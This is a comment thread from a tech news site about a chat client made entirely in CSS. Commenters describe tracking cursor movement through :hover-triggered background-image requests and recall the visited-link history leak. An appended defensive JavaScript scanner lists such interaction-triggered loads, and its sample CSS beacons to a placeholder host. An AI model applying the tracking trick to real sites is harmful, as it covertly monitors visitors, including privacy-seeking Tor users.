Originally published at: https://boingboing.net/2019/05/07/chat-client-made-entirely-with.html
…
Agree completely. It is a total abomination and you do seem to love it.
Some people have way way way too much free time.
Gross
For being made with CSS you’d think it’d look nicer…
At least the first part of that seems to be a common reaction, since I saw the headline, and literally my first thought was that I should leave a comment pointing out that it’s an abomination.
Neat trick and abomination as it may be, I think this is the bigger take-home message:
It occurred to me that you can remotely monitor the cursor location without JS by using some CSS :hover selectors to change hidden background images (causing a GET request).
This should work on Tor as well and could be an interesting approach to tracking visitors.
There was a similar trick to leak the contents of the browser history by exploiting the difference of style between visited and unvisited links. The takeaway, I think, was: always preload resources. This was more than 15 years ago.
Apparently we’ve learned nothing.
This is a relatively minor security hole, in that it can only leak information about mouse movements (not history or other state information beyond the scope of the current page) – and it’s a strict subset of what the server can already obtain if JavaScript is turned on – but it’s still a leak.
I guess the moral is “when scripting is disabled, UAs should (must) load all referenced resources immediately, and not reload them via HTTP while the page is displayed, regardless of cache expiry headers”.
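An added example, not part of the original thread: a static check a defender could run over a stylesheet to list the `url()` loads that fire only when an interaction pseudo-class matches, which is the mechanism the `:hover` comment describes. It goes beyond `:hover` to `:active`, `:focus` and `:checked`; the function name, the sample CSS and the host `log.example` are constructed for illustration.

```javascript
// Pseudo-classes that only match in response to something the user does.
const STATE_PSEUDO = /:(hover|active|focus|checked)\b/i;

// Return every url() that a rule with an interaction-dependent selector would fetch.
// Simplification: selector lists are split on commas, so :is(a, b) is split too.
function findStateTriggeredLoads(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments first
  const findings = [];
  // Innermost "selector { declarations }" blocks; this also reaches rules inside @media.
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  for (const [, prelude, body] of css.matchAll(rule)) {
    const selectors = prelude
      .split(",")
      .map((s) => s.trim())
      .filter((s) => STATE_PSEUDO.test(s));
    if (selectors.length === 0) continue; // rule applies unconditionally
    for (const [, , raw] of body.matchAll(/url\(\s*(['"]?)(.*?)\1\s*\)/gi)) {
      const url = raw.trim();
      // data: URIs and fragment references resolve locally; no request is sent.
      if (/^(data:|#)/i.test(url)) continue;
      for (const selector of selectors) findings.push({ selector, url });
    }
  }
  return findings;
}

// Constructed sample stylesheet; log.example is a placeholder host.
const SAMPLE_CSS = `
/* constructed sample */
.logo { background: url("/static/logo.png"); }
.cell-3-7:hover { background-image: url("https://log.example/p?x=3&y=7"); }
@media screen {
  nav a:hover, nav a:focus { background: url(data:image/gif;base64,R0lGOD) }
  button:active::after { content: url('https://log.example/click?id=send'); }
}
`;

for (const f of findStateTriggeredLoads(SAMPLE_CSS)) {
  console.log(`${f.selector} -> ${f.url}`);
}
```

Rules flagged this way are the ones whose images a user agent would otherwise request lazily; the unconditional `.logo` rule and the inline `data:` image are not reported.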